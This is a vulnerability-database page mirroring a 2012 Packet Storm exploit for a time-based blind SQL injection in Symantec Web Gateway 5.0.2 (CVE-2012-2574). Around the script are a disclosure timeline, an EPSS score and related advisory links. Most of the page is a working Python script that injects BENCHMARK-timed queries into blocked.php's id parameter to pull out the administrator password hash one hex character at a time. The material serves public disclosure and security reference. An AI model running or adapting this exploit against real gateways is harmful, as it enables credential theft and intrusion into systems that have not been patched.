Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMutsPACKETSTORM:114958
HistoryJul 23, 2012 - 12:00 a.m.

Symantec Web Gateway 5.0.2 Blind SQL Injection

2012-07-2300:00:00
muts
packetstormsecurity.com
22

0.865 High

EPSS

Percentile

98.6%

JSON
`#!/usr/bin/python  
  
######################################################################################  
# Exploit Title: Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection  
# Date: Jul 23 2012  
# Author: muts  
# Version: Symantec Web Gateway 5.0.2  
# Vendor URL: http://www.symantec.com  
#  
# Timeline:  
#  
# 29 May 2012: Vulnerability reported to CERT  
# 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012  
# 26 Jun 2012: Email received from Symantec for additional information  
# 26 Jun 2012: Additional proofs of concept sent to Symantec  
# 06 Jul 2012: Update received from Symantec with intent to fix  
# 20 Jul 2012: Symantec patch released: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00  
# 23 Jul 2012: Public Disclosure  
#  
######################################################################################  
  
import urllib  
import time  
import sys  
from time import sleep  
  
# Set your timing variable. A minimum value of 200 (2 seconds) was tested on localhost.  
# This might need to be higher on production systems.  
  
timing=300  
  
def check_char(i,j,timing):  
  
url = ("https://172.16.254.111/spywall/blocked.php?d=3&file=3&id=1)" +  
" or 1=(select IF(conv(mid((select password from users),%s,1),16,10) "+  
"= %s,BENCHMARK(%s,rand()),11) LIMIT 1&history=-2&u=3") % (j,i,timing)  
start=time.time()  
urllib.urlopen(url)  
end =time.time()  
howlong=int(end-start)  
return howlong  
  
counter=0  
startexploit=time.time()  
print "[*] Symantec \"Wall of Spies\" hash extractor"  
print "[*] Time Based SQL injection, please wait..."  
sys.stdout.write("[*] Admin hash is : ")  
sys.stdout.flush()  
  
for m in range(1,33):  
for n in range(0,16):  
counter= counter+1  
output = check_char(n,m,timing)  
if output > ((timing/100)-1):  
byte =hex(n)[2:]  
sys.stdout.write(byte)  
sys.stdout.flush()  
break  
endexploit=time.time()  
totalrun=str(endexploit-startexploit)  
print "\n[*] Total of %s queries in %s seconds" % (counter,totalrun)  
  
`

Related

checkpoint_advisories 2
cvelist 1
nvd 1
prion 1
cve 1
openvas 1
cert 1
symantec 1
checkpoint_advisories
checkpoint_advisories
Symantec Web Gateway blocked.php Blind SQL Injection (CVE-2012-2574)
2012-10-14 00:00:00
Symantec Web Gateway blocked.php Blind SQL Injection - Ver2 (CVE-2012-2574)
2014-03-03 00:00:00
cvelist
cvelist
CVE-2012-2574
2012-07-23 17:00:00
nvd
nvd
CVE-2012-2574
2012-07-23 17:55:03
prion
prion
Sql injection
2012-07-23 17:55:00
cve
cve
CVE-2012-2574
2012-07-23 17:55:03
openvas
openvas
Symantec Web Gateway Multiple Vulnerabilities
2012-07-24 00:00:00
cert
cert
Symantec Web Gateway contains multiple vulnerabilities
2012-07-24 00:00:00
symantec
symantec
Symantec Web Gateway Security Issues
2012-07-20 08:00:00

0.865 High

EPSS

Percentile

98.6%

JSON
Related for PACKETSTORM:114958
checkpoint_advisories2cvelist1nvd1prion1cve1openvas1cert1symantec1